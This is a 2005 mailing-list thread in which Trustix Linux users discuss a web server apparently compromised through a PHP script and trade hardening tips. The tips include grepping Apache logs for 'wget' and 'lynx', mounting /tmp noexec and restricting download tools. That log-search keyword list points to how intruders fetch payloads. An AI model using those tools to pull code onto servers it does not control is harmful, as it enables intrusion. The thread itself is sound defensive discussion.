On Wed, 16 Nov 2005, anu bhaskar wrote: >> A friends that have an httpd server based on TSL 2.2 have received this >> mail: >> Subject: Your_host_have_been_attacked >> Your host have been attacked by pv script. Look on netstat -anp for >> process listen on 4123 port >> It tell me that there is a process listing on port 4123 and another on >> 22222. Stopping httpd and killing the process that own the daemons seems >> temporarily "solve" the problem. He did that process are owned by httpd. >> It is now busy in rebuilding a new box where to migrate data, so request >> me to collect info on the "pv script". >> Any hints? >> > You may have a bad php script on your machine. Check your apache logs > for traces of injecting bad programs. Specifically grep for the terms > "wget", "lynx" etc on the apache logs since there is a chance that > intruder may have uploaded a php script. Also check if your php has any > vulnerability.
> Some points to secure your server > 1. Turn on the safe mode option in php.ini (caution some website codes > needs to be rewritten if you do this) Tried also in my server: Users don't like it and tell that other ISP don't have this limit (that cut-off most of the script php they can get from the net ...) > 2. Create /tmp as a separate partition and mount it with noexec option. > Make symbolic links of other tmps (eg: /var/tmp) to this partition. Yes, but if it is a good pratice, why TSL or other distro don't apply it? I am testing into a my box (also a TSL 2.2 that is why I am interested) I have read about problems for other programs (like logrotate). Following the hints I have: ---------- Logrotate is run daily per default. The acutal script can be found in /etc/cron.daily/logrotate. To fix this I create a tmp directory, /tmp_safe, that is going to be used by logrotate only. Then I add the following to the top of /etc/cron.daily/logrotate. export TMPDIR=/tmp_safeNo logrotate will use /tmp_safe as a tmp directory instead of /tmp. All other applications running on the system will still use /tmp as normal. ---------- But surely there are others programs that use (properly), /tmp ... > 3. Remove wget, lynx, make etc programs from your server once it is in > production. Or atleast chmod them so that only root can use it ;-) > 4. Put iptables. For what I know, the box have only port 80, 443, 21 forwarded from the firewall ... Still useful iptables? Thanks, B. _______________________________________________ tsl-discuss mailing list [email protected] http://lists.trustix.org/mailman/listinfo/tsl-discuss
